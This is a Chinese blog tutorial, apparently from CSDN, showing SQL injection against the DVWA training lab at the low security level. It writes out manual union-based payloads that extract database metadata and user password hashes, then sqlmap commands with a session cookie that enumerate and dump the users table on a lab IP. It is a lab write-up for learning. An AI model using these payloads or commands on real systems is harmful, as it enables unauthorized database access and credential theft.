DVWA -SQL Injection (low)

本文介绍了DVWA中SQL Injection(low)级别的手工注入和使用sqlmap工具进行注入的详细步骤。包括判断注入类型、猜测字段数、获取用户信息、表名、字段名和字段值等,并演示了sqlmap如何探测注入点、枚举数据库、表、列及转储数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

low级别(手工注入 和 sqlmap工具注入)
**

手动注入

**

1.判断是否存在注入,注入的类型是字符型还是数字型
输入1:(输入1-5都会返回正确的值)在这里插入图片描述
输入 1’(发现报错,存在注入漏洞)

在这里插入图片描述

Id是被’ ‘包括起来的,是属于字符型注入

闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值)
在这里插入图片描述
输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。

在这里插入图片描述

2.猜测sql查询语句中的字段数
1’ order by 3#
在这里插入图片描述
1’ order by 2#
在这里插入图片描述

3.确定显示的字段顺序

0’ union select 1,2#
在这里插入图片描述

4.获取当前用户,数据库,版本号
0’ union select 1,concat(user(),database(),version())#

在这里插入图片描述

5.获取表名
0’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
在这里插入图片描述
6.获取字段名
0’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
在这里插入图片描述

7.获取字段值
0’ union select 1,group_concat(user,0x3a,password) from users#
在这里插入图片描述
在这里插入图片描述
**

sqlmap工具注入

**

用到的参数
-u URL, --url=URL :指定URL
–cookie=COOKIE :HTTP Cookie header值
–dbs :枚举数据库管理系统数据库
–tables :枚举DBMS数据库中的表
–columns :枚举DBMS数据库表列
-D DB :要进行枚举的指定数据库名
-T TBL :DBMS数据库表枚举
-C COL :DBMS数据库表列枚举
–dump :z转储数据库表项

1.查看有无注入点
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
在这里插入图片描述
有一个302跳转,跳转到的是登录页面,所以这个时候需要用cookie进行会话维持,然后用burpsuite或者f12,找到cookie
在这里插入图片描述
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho”
在这里插入图片描述
在这里插入图片描述
存在注入

2.获取数据库名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” --dbs
在这里插入图片描述
3.获取dvwa数据库中表名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa --tables
在这里插入图片描述
4.获取dvwa数据库中users表中的字段名
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --columns
在这里插入图片描述
5.获取user,password的值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users -C user,password --dump
在这里插入图片描述
6.获取所有字段值
sqlmap -u “http://192.168.6.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=jp1444bfo7d8didsl5m6vn1aho” -D dvwa -T users --dump
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值